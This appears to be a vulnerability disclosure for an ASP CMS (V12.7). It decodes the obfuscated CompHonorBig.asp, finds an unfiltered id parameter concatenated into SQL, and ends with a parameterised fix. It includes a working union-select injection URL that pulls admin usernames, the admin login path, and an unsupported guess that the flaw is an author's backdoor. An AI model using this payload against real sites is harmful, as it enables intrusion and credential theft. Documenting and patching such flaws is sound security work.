Affected version: V12.7
Vulnerability type: SQL injection
Vulnerable file: CompHonorBig.asp
The file contains a block of encoded (VBScript.Encode) code:
<%@ LANGUAGE = VBScript.Encode %>
<!--#include file="Inc/conn.asp"-->
<%#@~^JgAAAA==[b:~bN@#@&k9Mn;!+dYcp;nMX?D.k o`rr[J*bgwAAA==^#~@%>
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%#@~^cAAAAA==@#@&/nDPM/k+M-+MR/D lOn}4L ^YvJl9G[4cD mGD[d YE#@#@&DkRG2 xPEd VnmD~CPWMWsPZK:auW W.PStn. Pk9xJLkNB^Gx ~8~q@#@&MyMAAA==^#~@%>
<%#@~^6gAAAA==r6POMks`Dk`r/WswuWW.E*#@!@*EJ,Yt U@#@&iP,Dn/2G/nRS.kD+~E@!Nk-~mVro xEmn Y DB@*@!bho,/.m{JOMk:v./vJZKh2CKxKDE#brP8WM[+MT~@*@!z[r7@*E@#@&n^/n@#@&iPPM+k2W/nRqDrO PJ@!r:TP/M^xksoJxGwr^cL2o,Ak9Y4x+*P4nbo4Y{1+PC^Y{暂时没有图片!@*J@#@& UN,kWu0IAAA==^#~@%>
<div align="center">
<%#@~^EwAAAA==OMkhvDk`J 6aslbxE#*eAYAAA==^#~@%>
</div>
<%#@~^IgAAAA==@#@&Ddcm^W/ @#@&d+DP./{xGO4kxT@#@&8wgAAA==^#~@%>
</body>
</html>
That made me curious: none of the other files are encoded, so why this one in particular? Looking at the rest of the code again, every other file has the anti-injection code added, while this one apparently never calls that anti-injection routine.
So I decoded it, and a 0day came along with it. Haha! After decoding:
<%@ LANGUAGE = VBScript %>
<!--#include file="Inc/conn.asp"-->
<%
dim id
id=request.QueryString("id")   ' receives the id parameter, no filtering
%>
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from CompHonor where id="&id,conn,1,1   ' id is concatenated straight into the query
%>
<%if trim(rs("CompHonor"))<>"" then
response.write "<div align=center><img src="&trim(rs("CompHonor"))&" border=0 ></div>"
else
response.Write "<img src=img/nopic.jpg width=65 height=96 alt=暂时没有图片!>"
end if%>
<div align="center">
<%=trim(rs("explain"))%>
</div>
<%
rs.close
set rs=nothing
%>
</body>
</html>
I suspect this is a backdoor left behind by the author, heh. No further comment.
Exploit (EXP):
http://127.0.0.1/CompHonorBig.asp?id=11 union select 1,username,3,4,5 from admin
Admin backend:
http://127.0.0.1/admin/login.asp
Fix:
Filter the id parameter before it is used in the query.
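A hardened rewrite of the decoded page, added here as an example and not code from the original CMS or its author. It assumes the same conn object from Inc/conn.asp and the same CompHonor table (columns id, CompHonor, explain) seen in the decoded code; the id parameter is allow-listed as an integer and bound as a typed query parameter instead of being concatenated into the SQL string.

```asp
<%@ LANGUAGE = VBScript %>
<!--#include file="Inc/conn.asp"-->
<%
' Hardened rewrite of the decoded CompHonorBig.asp (assumed: the same conn
' object from Inc/conn.asp and the same CompHonor table as the original).
' id must be a plain integer and is bound as a parameter, never as SQL text.
Dim rawId, id, re, cmd, rs
rawId = Trim(Request.QueryString("id"))
' Allow-list check: 1 to 9 decimal digits and nothing else (IsNumeric alone
' would still accept forms such as "1e3" or "&H10").
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid id"
    Response.End
End If
id = CLng(rawId)
' Parameterised query: the driver receives id as a value, so no union/quote tricks apply.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT * FROM CompHonor WHERE id = ?"
cmd.CommandType = 1                                         ' adCmdText
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , id) ' adInteger, adParamInput
Set rs = cmd.Execute
%>
<html>
<head>
<title>图片</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body>
<%
If Not rs.EOF Then
    ' HTMLEncode stored values so a poisoned row cannot inject markup either.
    If Trim(rs("CompHonor") & "") <> "" Then
        Response.Write "<div align=center><img src=""" & Server.HTMLEncode(Trim(rs("CompHonor"))) & """ border=0></div>"
    Else
        Response.Write "<img src=img/nopic.jpg width=65 height=96 alt=暂时没有图片!>"
    End If
    Response.Write "<div align=center>" & Server.HTMLEncode(Trim(rs("explain") & "")) & "</div>"
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
</body>
</html>
```

With this version a request whose id is anything other than a short run of digits is rejected with HTTP 400 before any database call is made.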